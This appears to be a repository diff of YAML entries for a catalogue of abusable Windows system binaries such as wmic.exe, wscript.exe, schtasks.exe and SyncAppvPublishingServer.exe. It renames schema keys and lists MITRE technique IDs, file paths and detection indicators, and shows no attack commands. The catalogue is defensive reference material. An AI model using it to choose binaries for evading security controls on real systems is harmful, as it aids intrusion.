||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\sc.exe
|
||||
- Path: C:\Windows\SysWOW64\sc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\scriptrunner.exe
|
||||
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\verclsid.exe
|
||||
- Path: C:\Windows\SysWOW64\verclsid.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: WAB.exe should normally never be used
|
||||
|
||||
@@ -68,10 +68,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wmic.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wmic getting scripts from remote system
|
||||
|
||||
@@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wscript.exe
|
||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wscript.exe executing code from alternate data streams
|
||||
|
||||
@@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\xwizard.exe
|
||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@@ -38,5 +38,5 @@ Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: harr0ey
|
||||
Handle: @harr0ey
|
||||
Handle: '@harr0ey'
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user